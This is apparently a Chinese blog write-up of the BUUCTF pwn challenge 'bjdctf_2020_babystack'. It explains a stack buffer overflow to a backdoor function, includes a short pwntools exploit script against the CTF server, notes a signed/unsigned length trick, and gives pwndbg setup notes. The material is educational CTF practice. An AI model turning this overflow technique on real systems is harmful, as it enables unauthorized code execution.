本文已参与「新人创作礼」活动,一起开启掘金创作之路
BUUCTF在线评测 (buuoj.cn)还是buu的题,
这次没什么好讲的,一道送分题,
但是明白了一个道理,不要太相信ida 的伪代码,那玩意的作用是帮你快速看明白题是在干什么,而不是帮你弄清楚做出这道题的细节。
尤其是数据长度部分
那么直接来分析
首先可以看到,只有NX,和部分RELRO保护
ida静态分析
也是非常干脆的给出了后门程序
主函数更是简单,用scanf来输入一个数字,把这个数字作为我们之后再read中的数据MAX大小。而看上面的接收参数只有0x10个大小(看伪代码此处说只有十二个,其实有16个,非常折磨),因此我们只需要输入16+8+8也就是32个字节就可以利用这个后门程序
但事实上只需要30个字节就可以完成利用,具体原理不知。
from pwn import *
p = remote('node4.buuoj.cn',29581)
payload = "A" * (0x10+8) + p64(0x4006E6)
p.sendlineafter('[+]Please input the length of your name:','32')
p.sendlineafter("[+]What's u name?",payload)
p.interactive()
其他小知识
注意一下可以发现一个问题
这个nbyte是一个无符号数,因此我们可以输入一个-1来得到一个很大的数,不清楚的朋友可以去了解一下补码反码相关知识
错误的栈
可以看到,它不仅仅把buff的大小判定错了,他的栈结构也有问题,正向栈的起始点并不是0,而是从4开始的
动态调试
在本次因为栈不正确,我学习了一下动态调试
首先是安装了pwndbg,安装十分简单
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
之后简单的使用
gdb 打开调试
file bjdctf_2020_babystack 打开文件
start 装入内存,准备运行
ctrl + c 中断运行
vmmap 查看内存和寄存器状态
r 开始运行
这是上述程序栈的状态。今天很简单,就这些吧
顺便一提,linux是真的适合深色主题,比Windows的深色好看多了,深色壁纸也合适。小日子老师yyds
